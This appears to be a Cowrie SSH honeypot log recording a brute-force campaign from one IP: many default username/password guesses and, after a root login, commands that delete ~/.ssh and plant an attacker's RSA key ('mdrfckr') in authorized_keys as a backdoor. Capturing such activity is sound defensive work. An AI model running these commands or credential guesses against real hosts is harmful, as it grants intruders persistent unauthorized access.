{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:08:08.219102Z","src_ip":"212.227.235.229","session":"f7e482f4d776"}
{"eventid":"cowrie.login.failed","username":"default","password":"pass","message":"login attempt [default/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:09.246986Z","src_ip":"212.227.235.229","session":"f7e482f4d776"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:10.495112Z","src_ip":"212.227.235.229","session":"f7e482f4d776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58538,"dst_ip":"1.2.3.4","dst_port":22,"session":"387b781e8049","protocol":"ssh","message":"New connection: 212.227.235.229:58538 (1.2.3.4:22) [session: 387b781e8049]","sensor":"my-vps","timestamp":"2025-09-09T06:08:11.151753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:08:11.152728Z","src_ip":"212.227.235.229","session":"387b781e8049"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:08:11.334162Z","src_ip":"212.227.235.229","session":"387b781e8049"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qazxsw2","message":"login attempt [admin/1qazxsw2] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:12.093545Z","src_ip":"212.227.235.229","session":"387b781e8049"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41008,"dst_ip":"1.2.3.4","dst_port":22,"session":"d893315081b5","protocol":"ssh","message":"New connection: 212.227.235.229:41008 (1.2.3.4:22) [session: d893315081b5]","sensor":"my-vps","timestamp":"2025-09-09T06:08:13.201579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:08:13.202554Z","src_ip":"212.227.235.229","session":"d893315081b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:08:13.280763Z","src_ip":"212.227.235.229","session":"d893315081b5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:13.284752Z","src_ip":"212.227.235.229","session":"387b781e8049"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:13.634268Z","src_ip":"212.227.235.229","session":"d893315081b5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:14.713952Z","src_ip":"212.227.235.229","session":"d893315081b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36014,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5d38e2bbd24","protocol":"ssh","message":"New connection: 212.227.235.229:36014 (1.2.3.4:22) [session: d5d38e2bbd24]","sensor":"my-vps","timestamp":"2025-09-09T06:08:20.098794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:08:20.100523Z","src_ip":"212.227.235.229","session":"d5d38e2bbd24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:08:20.335294Z","src_ip":"212.227.235.229","session":"d5d38e2bbd24"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:21.556486Z","src_ip":"212.227.235.229","session":"d5d38e2bbd24"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:22.735432Z","src_ip":"212.227.235.229","session":"d5d38e2bbd24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44589,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ad76193cffa","protocol":"ssh","message":"New connection: 212.227.235.229:44589 (1.2.3.4:22) [session: 7ad76193cffa]","sensor":"my-vps","timestamp":"2025-09-09T06:08:43.267410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:08:43.268357Z","src_ip":"212.227.235.229","session":"7ad76193cffa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:08:43.351930Z","src_ip":"212.227.235.229","session":"7ad76193cffa"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"2025","message":"login attempt [muhammad/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:08:43.727241Z","src_ip":"212.227.235.229","session":"7ad76193cffa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:08:44.812422Z","src_ip":"212.227.235.229","session":"7ad76193cffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58394,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c6d7103e845","protocol":"ssh","message":"New connection: 212.227.235.229:58394 (1.2.3.4:22) [session: 1c6d7103e845]","sensor":"my-vps","timestamp":"2025-09-09T06:09:21.962117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:09:21.964846Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:09:22.213140Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:09:23.098357Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:09:23.480001Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:09:23.480692Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:09:23.481780Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:23.657592Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:09:24.125039Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.125752Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.302044Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.303004Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59840,"dst_ip":"1.2.3.4","dst_port":22,"session":"68c7035992a7","protocol":"ssh","message":"New connection: 212.227.235.229:59840 (1.2.3.4:22) [session: 68c7035992a7]","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.475506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.476597Z","src_ip":"212.227.235.229","session":"68c7035992a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:09:24.647348Z","src_ip":"212.227.235.229","session":"68c7035992a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:09:25.373953Z","src_ip":"212.227.235.229","session":"68c7035992a7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:26.551419Z","src_ip":"212.227.235.229","session":"68c7035992a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60604,"dst_ip":"1.2.3.4","dst_port":22,"session":"e85b86a6db68","protocol":"ssh","message":"New connection: 212.227.235.229:60604 (1.2.3.4:22) [session: e85b86a6db68]","sensor":"my-vps","timestamp":"2025-09-09T06:09:26.732276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:09:26.733653Z","src_ip":"212.227.235.229","session":"e85b86a6db68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:09:26.912044Z","src_ip":"212.227.235.229","session":"e85b86a6db68"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:09:27.631073Z","src_ip":"212.227.235.229","session":"e85b86a6db68"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:27.807565Z","src_ip":"212.227.235.229","session":"1c6d7103e845"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:27.811943Z","src_ip":"212.227.235.229","session":"e85b86a6db68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"da837f1fc1ae","protocol":"ssh","message":"New connection: 212.227.235.229:53380 (1.2.3.4:22) [session: da837f1fc1ae]","sensor":"my-vps","timestamp":"2025-09-09T06:09:29.659879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:09:29.661818Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:09:29.850039Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123!","message":"login attempt [root/Admin123!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:09:30.575272Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:09:31.014397Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
